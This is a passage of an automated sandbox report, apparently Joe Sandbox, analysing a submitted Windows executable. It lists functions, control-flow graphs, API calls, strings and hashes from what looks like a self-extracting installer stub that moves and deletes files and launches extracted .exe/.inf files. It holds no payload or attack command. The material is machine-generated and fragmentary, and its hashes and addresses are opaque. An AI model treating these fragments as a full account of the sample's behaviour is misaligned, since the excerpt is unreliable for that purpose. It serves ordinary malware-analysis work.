                                          • Opcode Fuzzy Hash: 38b3e50e7fdf8d10217733150b38e2b3d872f3024fe2318dfa96782e51cf52c4
                                          • Instruction Fuzzy Hash: B042D171D4424CAAFF21EBB0AE8AFBE376CAB01714F040055F641A70E2CB795A44FB61
                                          Function 00F90863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 268 f90863-f90886 call f9ec50 GetModuleHandleW 271 f90888-f9089f GetProcAddress 268->271 272 f908e7-f90b48 268->272 275 f908b9-f908c9 GetProcAddress 271->275 276 f908a1-f908b7 271->276 273 f90b4e-f90b59 call fa75fb 272->273 274 f90c14-f90c40 GetModuleFileNameW call f8c29a call f90602 272->274 273->274 286 f90b5f-f90b8d GetModuleFileNameW CreateFileW 273->286 291 f90c42-f90c4e call f8b146 274->291 277 f908cb-f908e0 275->277 278 f908e5 275->278 276->275 277->278 278->272 288 f90c08-f90c0f CloseHandle 286->288 289 f90b8f-f90b9b SetFilePointer 286->289 288->274 289->288 292 f90b9d-f90bb9 ReadFile 289->292 298 f90c7d-f90ca4 call f8c310 GetFileAttributesW 291->298 299 f90c50-f90c5b call f9081b 291->299 292->288 294 f90bbb-f90be0 292->294 295 f90bfd-f90c06 call f90371 294->295 295->288 305 f90be2-f90bfc call f9081b 295->305 308 f90cae 298->308 309 f90ca6-f90caa 298->309 299->298 307 f90c5d-f90c7b CompareStringW 299->307 305->295 307->298 307->309 312 f90cb0-f90cb5 308->312 309->291 311 f90cac 309->311 311->312 313 f90cec-f90cee 312->313 314 f90cb7 312->314 315 f90dfb-f90e05 313->315 316 f90cf4-f90d0b call f8c2e4 call f8b146 313->316 317 f90cb9-f90ce0 call f8c310 GetFileAttributesW 314->317 327 f90d0d-f90d6e call f9081b * 2 call f8e617 call f84092 call f8e617 call f9a7e4 316->327 328 f90d73-f90da6 call f84092 AllocConsole 316->328 323 f90cea 317->323 324 f90ce2-f90ce6 317->324 323->313 324->317 326 f90ce8 324->326 326->313 334 f90df3-f90df5 ExitProcess 327->334 333 f90da8-f90ded GetCurrentProcessId AttachConsole call fa3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 00F9087C
                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F9088E
                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F908BF
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F90B69
                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F90B83
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F90B93
                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00FB3C7C,00000000), ref: 00F90BB1
                                          • CloseHandle.KERNEL32(00000000), ref: 00F90C09
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F90C1E
                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00FB3C7C,?,00000000,?,00000800), ref: 00F90C72
                                          • GetFileAttributesW.KERNEL32(?,?,00FB3C7C,00000800,?,00000000,?,00000800), ref: 00F90C9C
                                          • GetFileAttributesW.KERNEL32(?,?,00FB3D44,00000800), ref: 00F90CD8
                                            • Part of subcall function 00F9081B: GetSystemDirectoryW.KERNEL32(?,00000800,00FC81C8,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?,?), ref: 00F90836
                                            • Part of subcall function 00F9081B: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00F8F2D8,Crypt32.dll,00000000,00F8F35C,?,?,00F8F33E,?,?,?), ref: 00F90858
                                          • _swprintf.LIBCMT ref: 00F90D4A
                                          • _swprintf.LIBCMT ref: 00F90D96
                                            • Part of subcall function 00F84092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F840A5
                                          • AllocConsole.KERNEL32 ref: 00F90D9E
                                          • GetCurrentProcessId.KERNEL32 ref: 00F90DA8
                                          • AttachConsole.KERNEL32(00000000), ref: 00F90DAF
                                          • _wcslen.LIBCMT ref: 00F90DC4
                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F90DD5
                                          • WriteConsoleW.KERNEL32(00000000), ref: 00F90DDC
                                          • Sleep.KERNEL32(00002710), ref: 00F90DE7
                                          • FreeConsole.KERNEL32 ref: 00F90DED
                                          • ExitProcess.KERNEL32 ref: 00F90DF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                          • API String ID: 1207345701-3298887752
                                          • Opcode ID: 368c9397048aa993357745b0d34901a88a4f645ec9534dbd61c62fd73b826af9
                                          • Instruction ID: 746be9026d3cbd80bd18517584b0135cb5469bfb87d2a186987de47d80f7d411
                                          • Opcode Fuzzy Hash: 368c9397048aa993357745b0d34901a88a4f645ec9534dbd61c62fd73b826af9
                                          • Instruction Fuzzy Hash: 02D1A3B1488384AFD731AF51CD89BDFBAE8BF85344F40091DF18596142CB749648EF62
                                          Function 00F9C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 347 f9c73f-f9c757 call f9eb78 call f9ec50 352 f9d40d-f9d418 347->352 353 f9c75d-f9c787 call f9b314 347->353 353->352 356 f9c78d-f9c792 353->356 357 f9c793-f9c7a1 356->357 358 f9c7a2-f9c7b7 call f9af98 357->358 361 f9c7b9 358->361 362 f9c7bb-f9c7d0 call f91fbb 361->362 365 f9c7dd-f9c7e0 362->365 366 f9c7d2-f9c7d6 362->366 368 f9d3d9-f9d404 call f9b314 365->368 369 f9c7e6 365->369 366->362 367 f9c7d8 366->367 367->368 368->357 384 f9d40a-f9d40c 368->384 370 f9c7ed-f9c7f0 369->370 371 f9ca7c-f9ca7e 369->371 372 f9ca5f-f9ca61 369->372 373 f9c9be-f9c9c0 369->373 370->368 378 f9c7f6-f9c850 call f9a64d call f8bdf3 call f8a544 call f8a67e call f86edb 370->378 371->368 376 f9ca84-f9ca8b 371->376 372->368 375 f9ca67-f9ca77 SetWindowTextW 372->375 373->368 377 f9c9c6-f9c9d2 373->377 375->368 376->368 380 f9ca91-f9caaa 376->380 381 f9c9d4-f9c9e5 call fa7686 377->381 382 f9c9e6-f9c9eb 377->382 433 f9c98f-f9c9a4 call f8a5d1 378->433 385 f9caac 380->385 386 f9cab2-f9cac0 call fa3e13 380->386 381->382 389 f9c9ed-f9c9f3 382->389 390 f9c9f5-f9ca00 call f9b48e 382->390 384->352 385->386 386->368 403 f9cac6-f9cacf 386->403 394 f9ca05-f9ca07 389->394 390->394 399 f9ca09-f9ca10 call fa3e13 394->399 400 f9ca12-f9ca32 call fa3e13 call fa3e3e 394->400 399->400 421 f9ca4b-f9ca4d 400->421 422 f9ca34-f9ca3b 400->422 407 f9caf8-f9cafb 403->407 408 f9cad1-f9cad5 403->408 410 f9cb01-f9cb04 407->410 411 f9cbe0-f9cbee call f90602 407->411 408->410 413 f9cad7-f9cadf 408->413 415 f9cb11-f9cb2c 410->415 416 f9cb06-f9cb0b 410->416 431 f9cbf0-f9cc04 call fa279b 411->431 413->368 419 f9cae5-f9caf3 call f90602 413->419 434 f9cb2e-f9cb68 415->434 435 f9cb76-f9cb7d 415->435 416->411 416->415 419->431 421->368 430 f9ca53-f9ca5a call fa3e2e 421->430 428 f9ca3d-f9ca3f 422->428 429 f9ca42-f9ca4a call fa7686 422->429 428->429 429->421 430->368 446 f9cc11-f9cc62 call f90602 call f9b1be GetDlgItem SetWindowTextW SendMessageW call fa3e49 431->446 447 f9cc06-f9cc0a 431->447 451 f9c9aa-f9c9b9 call f8a55a 433->451 452 f9c855-f9c869 SetFileAttributesW 433->452 470 f9cb6a 434->470 471 f9cb6c-f9cb6e 434->471 440 f9cbab-f9cbce call fa3e13 * 2 435->440 441 f9cb7f-f9cb97 call fa3e13 435->441 440->431 475 f9cbd0-f9cbde call f905da 440->475 441->440 457 f9cb99-f9cba6 call f905da 441->457 481 f9cc67-f9cc6b 446->481 447->446 453 f9cc0c-f9cc0e 447->453 451->368 459 f9c90f-f9c91f GetFileAttributesW 452->459 460 f9c86f-f9c8a2 call f8b991 call f8b690 call fa3e13 452->460 453->446 457->440 459->433 468 f9c921-f9c930 DeleteFileW 459->468 490 f9c8b5-f9c8c3 call f8bdb4 460->490 491 f9c8a4-f9c8b3 call fa3e13 460->491 468->433 474 f9c932-f9c935 468->474 470->471 471->435 478 f9c939-f9c965 call f84092 GetFileAttributesW 474->478 475->431 488 f9c937-f9c938 478->488 489 f9c967-f9c97d MoveFileW 478->489 481->368 485 f9cc71-f9cc85 SendMessageW 481->485 485->368 488->478 489->433 492 f9c97f-f9c989 MoveFileExW 489->492 490->451 497 f9c8c9-f9c908 call fa3e13 call f9fff0 490->497 491->490 491->497 492->433 497->459
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F9C744
                                            • Part of subcall function 00F9B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F9B3FB
                                          • _wcslen.LIBCMT ref: 00F9CA0A
                                          • _wcslen.LIBCMT ref: 00F9CA13
                                          • SetWindowTextW.USER32(?,?), ref: 00F9CA71
                                          • _wcslen.LIBCMT ref: 00F9CAB3
                                          • _wcsrchr.LIBVCRUNTIME ref: 00F9CBFB
                                          • GetDlgItem.USER32(?,00000066), ref: 00F9CC36
                                          • SetWindowTextW.USER32(00000000,?), ref: 00F9CC46
                                          • SendMessageW.USER32(00000000,00000143,00000000,00FCA472), ref: 00F9CC54
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F9CC7F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                          • API String ID: 2804936435-312220925
                                          • Opcode ID: dd4a633a98e16dc4d571d4fa909099960fa84f6f5e37a330d6e0c294f56b0800
                                          • Instruction ID: 96cfc8594045f10fff74e3b7b473410a75776e8970b8eb4868783f1a7d602083
                                          • Opcode Fuzzy Hash: dd4a633a98e16dc4d571d4fa909099960fa84f6f5e37a330d6e0c294f56b0800
                                          • Instruction Fuzzy Hash: C3E174B2D00119AAEF24EBA0DD85EEE77BCAF05350F5041A6F605E7050EB749F84AF60
                                          Function 00F8DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00F8DA70
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F8DAAC
                                            • Part of subcall function 00F8C29A: _wcslen.LIBCMT ref: 00F8C2A2
                                            • Part of subcall function 00F905DA: _wcslen.LIBCMT ref: 00F905E0
                                            • Part of subcall function 00F91B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F8BAE9,00000000,?,?,?,0001040C), ref: 00F91BA0
                                          • _wcslen.LIBCMT ref: 00F8DDE9
                                          • __fprintf_l.LIBCMT ref: 00F8DF1C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                          • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                          • API String ID: 566448164-801612888
                                          • Opcode ID: b95beab477998603633bca1de11926ac39e852d54ed32c695893434b4ebc0e10
                                          • Instruction ID: 3ca4251d192060e406a5a9e32a09924aeba33b5847da9f95488c3e40acc27de2
                                          • Opcode Fuzzy Hash: b95beab477998603633bca1de11926ac39e852d54ed32c695893434b4ebc0e10
                                          • Instruction Fuzzy Hash: CE32EF72A00208ABDF24FF68CC45BEA77A9FF05310F44056AF90697291EBB5D984EB50
                                          Function 00F9D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          • GetDlgItem.USER32(00000068,00FDFCB8), ref: 00F9D4E8
                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00F9AF07,00000001,?,?,00F9B7B9,00FB506C,00FDFCB8,00FDFCB8,00001000,00000000,00000000), ref: 00F9D510
                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F9D51B
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB35F4), ref: 00F9D529
                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D53F
                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F9D559
                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D59D
                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F9D5AB
                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F9D5BA
                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F9D5E1
                                          • SendMessageW.USER32(00000000,000000C2,00000000,00FB43F4), ref: 00F9D5F0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                          • String ID: \
                                          • API String ID: 3569833718-2967466578
                                          • Opcode ID: a18044ecda8f43c0c828c378fd5813bd00d584484d30def91ee8eba7911e9081
                                          • Instruction ID: eedda926cce5dfcb396e1ba6728752813ebf2a285053a87fd50acd5fe53eaed8
                                          • Opcode Fuzzy Hash: a18044ecda8f43c0c828c378fd5813bd00d584484d30def91ee8eba7911e9081
                                          • Instruction Fuzzy Hash: E531077114838ABFE301DF20DC8EFAB7FACEB82318F000518F6519B190DB659A05A776
                                          Function 00F9D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 836 f9d78f-f9d7a7 call f9ec50 839 f9d9e8-f9d9f0 836->839 840 f9d7ad-f9d7b9 call fa3e13 836->840 840->839 843 f9d7bf-f9d7e7 call f9fff0 840->843 846 f9d7e9 843->846 847 f9d7f1-f9d7ff 843->847 846->847 848 f9d801-f9d804 847->848 849 f9d812-f9d818 847->849 850 f9d808-f9d80e 848->850 851 f9d85b-f9d85e 849->851 852 f9d810 850->852 853 f9d837-f9d844 850->853 851->850 854 f9d860-f9d866 851->854 855 f9d822-f9d82c 852->855 856 f9d84a-f9d84e 853->856 857 f9d9c0-f9d9c2 853->857 858 f9d868-f9d86b 854->858 859 f9d86d-f9d86f 854->859 862 f9d81a-f9d820 855->862 863 f9d82e 855->863 864 f9d854-f9d859 856->864 865 f9d9c6 856->865 857->865 858->859 860 f9d882-f9d898 call f8b92d 858->860 859->860 861 f9d871-f9d878 859->861 871 f9d89a-f9d8a7 call f91fbb 860->871 872 f9d8b1-f9d8bc call f8a231 860->872 861->860 866 f9d87a 861->866 862->855 868 f9d830-f9d833 862->868 863->853 864->851 870 f9d9cf 865->870 866->860 868->853 873 f9d9d6-f9d9d8 870->873 871->872 881 f9d8a9 871->881 882 f9d8d9-f9d8e6 ShellExecuteExW 872->882 883 f9d8be-f9d8d5 call f8b6c4 872->883 874 f9d9da-f9d9dc 873->874 875 f9d9e7 873->875 874->875 878 f9d9de-f9d9e1 ShowWindow 874->878 875->839 878->875 881->872 882->875 884 f9d8ec-f9d8f9 882->884 883->882 886 f9d8fb-f9d902 884->886 887 f9d90c-f9d90e 884->887 886->887 889 f9d904-f9d90a 886->889 890 f9d910-f9d919 887->890 891 f9d925-f9d944 call f9dc3b 887->891 889->887 892 f9d97b-f9d987 CloseHandle 889->892 890->891 899 f9d91b-f9d923 ShowWindow 890->899 891->892 905 f9d946-f9d94e 891->905 893 f9d989-f9d996 call f91fbb 892->893 894 f9d998-f9d9a6 892->894 893->870 893->894 894->873 898 f9d9a8-f9d9aa 894->898 898->873 902 f9d9ac-f9d9b2 898->902 899->891 902->873 904 f9d9b4-f9d9be 902->904 904->873 905->892 906 f9d950-f9d961 GetExitCodeProcess 905->906 906->892 907 f9d963-f9d96d 906->907 908 f9d96f 907->908 909 f9d974 907->909 908->909 909->892
                                          APIs
                                          • _wcslen.LIBCMT ref: 00F9D7AE
                                          • ShellExecuteExW.SHELL32(?), ref: 00F9D8DE
                                          • ShowWindow.USER32(?,00000000), ref: 00F9D91D
                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00F9D959
                                          • CloseHandle.KERNEL32(?), ref: 00F9D97F
                                          • ShowWindow.USER32(?,00000001), ref: 00F9D9E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                          • String ID: .exe$.inf
                                          • API String ID: 36480843-3750412487
                                          • Opcode ID: b1acd6868971d4de30e369aac18dc1e21f1eaa0861f13c7fcf0889e17c941a1b
                                          • Instruction ID: 18f9d681364254e383b5fa3639fb50e6bf437cb30e90a25059baacc5d0dc0dfa
                                          • Opcode Fuzzy Hash: b1acd6868971d4de30e369aac18dc1e21f1eaa0861f13c7fcf0889e17c941a1b
                                          • Instruction Fuzzy Hash: 595117718083849AFF31AF24D844BABBBE5AF81764F24041EF5C5971A1E775C948FB12
                                          Function 00FAA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 910 faa95b-faa974 911 faa98a-faa98f 910->911 912 faa976-faa986 call faef4c 910->912 913 faa99c-faa9c0 MultiByteToWideChar 911->913 914 faa991-faa999 911->914 912->911 922 faa988 912->922 916 faab53-faab66 call f9fbbc 913->916 917 faa9c6-faa9d2 913->917 914->913 919 faaa26 917->919 920 faa9d4-faa9e5 917->920 926 faaa28-faaa2a 919->926 923 faa9e7-faa9f6 call fb2010 920->923 924 faaa04-faaa15 call fa8e06 920->924 922->911 927 faab48 923->927 937 faa9fc-faaa02 923->937 924->927 938 faaa1b 924->938 926->927 928 faaa30-faaa43 MultiByteToWideChar 926->928 932 faab4a-faab51 call faabc3 927->932 928->927 931 faaa49-faaa5b call faaf6c 928->931 939 faaa60-faaa64 931->939 932->916 941 faaa21-faaa24 937->941 938->941 939->927 942 faaa6a-faaa71 939->942 941->926 943 faaaab-faaab7 942->943 944 faaa73-faaa78 942->944 946 faaab9-faaaca 943->946 947 faab03 943->947 944->932 945 faaa7e-faaa80 944->945 945->927 948 faaa86-faaaa0 call faaf6c 945->948 950 faaacc-faaadb call fb2010 946->950 951 faaae5-faaaf6 call fa8e06 946->951 949 faab05-faab07 947->949 948->932 965 faaaa6 948->965 954 faab09-faab22 call faaf6c 949->954 955 faab41-faab47 call faabc3 949->955 950->955 963 faaadd-faaae3 950->963 951->955 964 faaaf8 951->964 954->955 968 faab24-faab2b 954->968 955->927 967 faaafe-faab01 963->967 964->967 965->927 967->949 969 faab2d-faab2e 968->969 970 faab67-faab6d 968->970 971 faab2f-faab3f WideCharToMultiByte 969->971 970->971 971->955 972 faab6f-faab76 call faabc3 971->972 972->932
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FA5695,00FA5695,?,?,?,00FAABAC,00000001,00000001,2DE85006), ref: 00FAA9B5
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FAABAC,00000001,00000001,2DE85006,?,?,?), ref: 00FAAA3B
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FAAB35
                                          • __freea.LIBCMT ref: 00FAAB42
                                            • Part of subcall function 00FA8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FACA2C,00000000,?,00FA6CBE,?,00000008,?,00FA91E0,?,?,?), ref: 00FA8E38
                                          • __freea.LIBCMT ref: 00FAAB4B
                                          • __freea.LIBCMT ref: 00FAAB70
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                          • String ID:
                                          • API String ID: 1414292761-0
                                          • Opcode ID: e61c74af076836d75a0e203dafb27776a34604f7063c18d35d1bea638863467e
                                          • Instruction ID: 7115ed4138135cba7c352f4178698b4bc05bde6243e11bd3bd1e609e6c0ed0ad
                                          • Opcode Fuzzy Hash: e61c74af076836d75a0e203dafb27776a34604f7063c18d35d1bea638863467e
                                          • Instruction Fuzzy Hash: 1651F9F2A00216AFDB258F64CC41FBFB7AAEB867A0F154628FC14D6150DB34DC58E661
                                          Function 00FA3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 975 fa3b72-fa3b7c 976 fa3bee-fa3bf1 975->976 977 fa3b7e-fa3b8c 976->977 978 fa3bf3 976->978 980 fa3b8e-fa3b91 977->980 981 fa3b95-fa3bb1 LoadLibraryExW 977->981 979 fa3bf5-fa3bf9 978->979 984 fa3c09-fa3c0b 980->984 985 fa3b93 980->985 982 fa3bfa-fa3c00 981->982 983 fa3bb3-fa3bbc GetLastError 981->983 982->984 988 fa3c02-fa3c03 FreeLibrary 982->988 986 fa3bbe-fa3bd3 call fa6088 983->986 987 fa3be6-fa3be9 983->987 984->979 989 fa3beb 985->989 986->987 992 fa3bd5-fa3be4 LoadLibraryExW 986->992 987->989 988->984 989->976 992->982 992->987
                                          APIs
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00FA3C35,?,?,00FE2088,00000000,?,00FA3D60,00000004,InitializeCriticalSectionEx,00FB6394,InitializeCriticalSectionEx,00000000), ref: 00FA3C03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID: api-ms-
                                          • API String ID: 3664257935-2084034818
                                          • Opcode ID: e706611e6e1b38a991edbcdbb1d5f3ff7590dd17d8edf28e6f22295657617f24
                                          • Instruction ID: c02a2d1486ac2dc50c267b6ed3aa097770bec96c696c94aa488c8b481177cccb
